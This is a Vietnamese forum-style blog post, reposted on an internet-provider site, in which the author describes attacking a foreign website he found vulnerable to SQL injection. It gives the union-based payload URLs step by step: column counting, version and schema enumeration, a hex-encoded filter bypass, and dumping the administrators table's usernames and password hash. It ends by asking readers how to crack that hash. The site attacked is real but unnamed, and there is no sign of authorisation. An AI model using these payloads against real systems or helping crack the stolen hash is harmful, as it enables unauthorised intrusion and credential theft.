Cách khắc phục lỗi khi tấn công SQL Injection

Chào mọi người, mình mò mãi được 1 site nước ngoài bị lỗi SQL Injection mà có thể khai thác qua phương pháp Inband, nên tập tấn công thử xem...

Chào mọi người, mình mò mãi được 1 site nước ngoài bị lỗi SQL Injection mà có thể khai thác qua
phương pháp Inband, nên tập tấn công thử xem, đây là 1 phương pháp đơn giản và dể dàng nhất đối với anh em biết đến SQL Injection, nhưng còn vấp phải 1 số lỗi, cụ thể mình xin trình bày nhanh:

Trước tiên mình cũng xin gửi lời cám ơn đến 2 ad talentkong và xiuchac bên diễn đàn ceh.vn đã giúp đỡ mình trong các thao tác.

Trang mình làm dạng là:
Code:
http://www.abc.co.uk/node.php?id=1

chạy ok không lỗi
tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=1'

ok đã thấy lỗi SQL Injection
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Tiếp theo tìm số cột bằng cách chạy
Code:
http://www.abc.co.uk/node.php?id=1 order by 1--

rồi dần dần tăng lên 1 đơn vị thì thấy đến 5 là báo lỗi suy ra có 4 cột từ 1-4, ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=nul union select 1,2,3,4--

để tìm số cột bị lỗi và ở đây nó báo là 4
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=null union select 1,2,3,version()--

để lấy version database thì thấy hiện Code:
5.1.73-log

Tiếp theo chay
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(schema_name) from information_schema.schemata--

để lấy tên database thì thấy báo Code:
information_schema,db312892314
ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--

để lấy danh sách bảng trong database thì thấy hiện 1 đống các bảng sau
Code:
administrators,album,events,gallery,links,news,p_album,p_categories,p_events,p_gallery,p_links,p_news,p_products,p_salsa,p_suscriptors,p_users,p_videos,salsa,suscriptors,users,videos

Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e6973747261746f7273--

đề lấy các cột trong bảng administrators, ở đây phải thực hiện phương pháp bypass filter addslashes() chứ gõ administrator là không được.
thấy hiện lên các cột Code:
id, user_name,user_password
ok bước này xong
Tiếp theo là bước quan trọng gần xong là lấy user_name và pass trong các cột của bảng administrators
Mình chạy truy vấn sau
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(id,0x2f,user_name,0x2f,user_password) from administrators -- -

thì đã lấy được user và pass nhưng pass dạng sau
Code:
$P$Bstga7byV42vvh7WVT/pPFPZw6j7ET.
thì dầu đoạn mã trên có ký tự $P$B thì biết đó là kiểu Decrypt MD5 $Wordpress gì đấy, vào mấy trang decrypt online mà không ăn thua, ai có cao kiến gì không ?
Ads Here
Tên

1st,2,8051,3,AAG,1,ADS,2,ADSL,2,AIO,1,Alarm,1,Altcoin,1,AMD,2,Amplifier,4,Android,2,Android TV,3,AOE,1,APG,1,APK,3,ASIC,2,ATX,2,AVG,3,Ấp trứng,2,Bàn phím cơ,1,Bản quyền,1,baner,3,Bảng giá,5,Banggood,1,Báo giá,1,Báo hỏng,1,Bảo Mật,4,BCC,1,BCN,1,Binance,1,Bitcoin,5,Bitmex,1,Bittrex,1,BIX,1,blogger,2,BNB,1,bootrom,1,BTC,4,Build PC,1,ByteCoin,1,cable,1,Cài đặt,3,Cài Win,2,Camera,6,Camera giám sát,3,camera IP,2,Cáp quang,8,Cáp quang Cá nhân,2,Cáp quang Doanh nghiệp,1,Cấu hình máy,1,CCTV,1,Chống nước,1,Clicksense,2,Cloud,1,Cloud camera,2,Code,8,Code web,8,coin,5,Combo,1,Controller,1,Covid-19,9,Công nghệ mới,1,Cryptocurrency,26,Cung hoàng đạo,1,DAG,1,DDos,39,DEEP WEB,3,Dịch vụ FPT,4,DIY,8,Đại Từ,1,Đánh giá,5,Đào coin,6,Đâu là đúng,5,Địa chỉ,1,Điện thoại,2,Điều khiển giọng nói,1,Đồng hồ,1,Electronics,1,English,2,epon,1,ETC,1,ETH,6,Facebook,10,featured,1,Foxy,1,fpt,12,FPT camera,4,FPT internet,3,FPT Play,1,FPT Play Box,32,FPT Playbox,3,FPT Telecom,5,FPT Thái Nguyên,6,FPT TV,1,FPT TV 4K,1,FPT TVOnly,1,fshare,1,G-97D2,3,G97RG6M1,1,Game,2,Game gear,1,Game PC,2,getlink,1,Ghost,2,Ghost Windows 10,2,Ghost Windows 7,7,Gói cá nhân,2,Gói cước,2,Gói cước FPT,8,Gói Doanh Nghiệp,4,Gói kênh FPT Play,1,GPON,3,GPU,2,Hà Nội,1,Hacker,1,Hàn Quốc,1,HBO,1,HG531,2,Hi FPT,3,HiFPT,1,Học Online,1,Hot,15,houbi,3,HT,1,HTC,1,Hướng dẫn,10,Hướng dẫn FPT,8,IC555,4,ICO,3,Ifan,1,Infographic,2,internet,8,Inverter,1,IP tĩnh,1,IPTV,1,ISO,1,K+,1,KCS,1,Key,1,keypad,1,Kho Tut,59,Khuyến mại,10,kích sóng wifi,1,Kiếm tiền trên mạng,1,Kiến thức,2,Kinh nghiệm,1,Lan,1,Laptop,1,Lắp mạng,3,LED,6,leech link,1,Li-Ion,1,Light,1,LM386,1,Love,2,Lừa đảo,1,Ma kết,1,Mạch Audio,1,Mạch điện tử,1,Mạch sạc,5,Mainboard,1,Mạng chậm,1,Mạng internet,3,Mạng LAN,3,Máy ảnh,1,Máy tính,3,Meter,1,Miband,3,Microsoft,1,Minning,4,MMO,3,Mobile,3,Modem,17,Mở két,1,Music,1,Netflix,1,News,7,Ngoại ngữ,1,Nguồn,3,Nvidia,1,offer,1,Office,2,Onedrive,1,Online,1,OS,2,Others,1,Paypal,1,PC,1,PCB,1,PDF,1,Phấn Mễ,1,Phần mềm,2,Phim,1,Phòng nét,1,Photo,1,Phổ Yên,1,Phú Lương,1,Phụ nữ,1,PIC,2,Pin - Ắc qui,4,proxy,1,PUBG,1,Python,4,Remitano,3,Repeater,1,Review,4,Review FPT,2,Root,1,Router,2,Rút gọn link,1,sạc dụng phòng,1,Sạc điện thoại,1,Sàn giao dịch,2,Scam,3,Sensor,2,setup,2,smarthome,1,Softwares,5,sonoff,1,SQL,3,Super 22,2,Tài liệu,182,Tenda Nova MW3,1,Thái Nguyên,19,Thẻ visa,1,Thể thao,1,Thi công,1,Thơ thẩn,3,Thủ thuật,89,Tiền bạc,1,Tiền điện tử,3,Tin FPT,5,Tin tức,41,Tình yêu,4,Tivi box,1,Tivi Gold,1,TNUT,1,Tool,2,Tool đào coin,6,Tools,45,TP Link,1,TP-Link,3,trade coin,8,Trading,1,Transitsor,2,Trâu cày,2,Truyện,3,Truyền hình,4,Truyền hình FPT,29,Tuyển dụng,3,Tư vấn,4,TV Box,3,UG,15,USB,1,USDT,2,VGA,1,Video,1,Viettel,2,Viễn thông,1,Vinaphone,1,Virus,11,VPN,1,Web,1,wifi,17,Wifi Maketting,1,Window XP,3,Windows,4,Windows 10,6,Windows 10 Mobile,1,Windows 7,2,Xiaomi,4,XMR,2,Youtube,1,Zcash,1,Zec,1,
ltr
item
Tổng đài lắp mạng FPT Thái Nguyên |Cáp quang | Wifi | Truyền hình 4K |FPT Play Box: Cách khắc phục lỗi khi tấn công SQL Injection
Cách khắc phục lỗi khi tấn công SQL Injection
Tổng đài lắp mạng FPT Thái Nguyên |Cáp quang | Wifi | Truyền hình 4K |FPT Play Box
https://www.xn--fptthinguyn-o7a6j.vn/2015/08/cach-khac-phuc-loi-khi-tan-cong-sql.html
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/2015/08/cach-khac-phuc-loi-khi-tan-cong-sql.html
true
8240370674769512952
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy